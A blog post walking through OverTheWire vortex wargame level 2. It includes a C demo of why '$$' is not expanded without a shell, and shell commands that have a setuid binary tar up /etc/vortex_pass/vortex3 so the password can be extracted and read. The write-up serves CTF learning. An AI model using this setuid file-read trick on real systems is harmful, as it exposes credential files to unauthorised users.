Klaus' Log

Wed 10 October 2018

Overthewire vortex Wargame - Level 2

Posted by Klaus Eisentraut in ctf   

This is a post from my vortex Wargame series. Please find the links to my previous solutions here: Level #0 and #1.

Level 2

Level #2 was very easy, somehow even too easy :*(

At first, I thought the $$ would be expanded to the PID, as is usually the case in a shell. However, that does not happen here: the filename is taken literally because there is no shell involved.
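The difference is easy to reproduce. The following C program is an added example, not code from the wargame or from the original post; /bin/echo stands in for the executed program and the helper names are made up for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run argv[0] with argv and copy the first line of its stdout into out.
 * Returns 0 on success, -1 on any failure. */
static int capture(char *const argv[], char *out, size_t n) {
    int fd[2], status;
    if (pipe(fd) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {                  /* child: stdout -> pipe, then exec */
        dup2(fd[1], STDOUT_FILENO);
        close(fd[0]); close(fd[1]);
        execv(argv[0], argv);        /* no shell: argv is handed over verbatim */
        _exit(127);
    }
    close(fd[1]);
    ssize_t len = read(fd[0], out, n - 1);
    close(fd[0]);
    waitpid(pid, &status, 0);
    if (len < 0 || !WIFEXITED(status) || WEXITSTATUS(status) != 0) return -1;
    out[len] = '\0';
    out[strcspn(out, "\n")] = '\0';  /* strip the trailing newline */
    return 0;
}

/* Returns 1 if name reaches the child unchanged when passed straight to execv. */
int literal_via_execv(const char *name) {
    char buf[256];
    char *argv[] = { "/bin/echo", (char *)name, NULL };
    return capture(argv, buf, sizeof buf) == 0 && strcmp(buf, name) == 0;
}

/* Returns 1 if name comes back changed once /bin/sh parses it first
 * (the shell replaces $$ with its own PID). */
int expanded_via_shell(const char *name) {
    char cmd[300], buf[256];
    snprintf(cmd, sizeof cmd, "echo %s", name);
    char *argv[] = { "/bin/sh", "-c", cmd, NULL };
    return capture(argv, buf, sizeof buf) == 0 && strcmp(buf, name) != 0;
}

int main(void) {
    const char *name = "/tmp/ownership.$$.tar";
    printf("execv keeps literal: %d, shell expands: %d\n",
           literal_via_execv(name), expanded_via_shell(name));
}
```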

The solution is now pretty straightforward. If we execute /vortex/vortex2, it runs with the privileges of vortex3 because of the setuid bit. As all it does is create a tar file /tmp/ownership.$$.tar, we let it pack the password file /etc/vortex_pass/vortex3 into its tar, then copy the tar back and extract it.

vortex2@vortex:~$ /vortex/vortex2 /etc/vortex_pass/vortex3
/bin/tar: Removing leading `/' from member names
vortex2@vortex:~$ cp -v /tmp/ownership.\$\$.tar .
'/tmp/ownership.$$.tar' -> './ownership.$$.tar'
vortex2@vortex:~$ tar xvf ownership.\$\$.tar  
etc/vortex_pass/vortex3
vortex2@vortex:~$ cat etc/vortex_pass/vortex3 
64[...snip...]
vortex2@vortex:~$ rm -rf etc/ ownership.\$\$.tar 

Please don't forget to clean up in the /home folder, as you don't want to spoil the level for other users.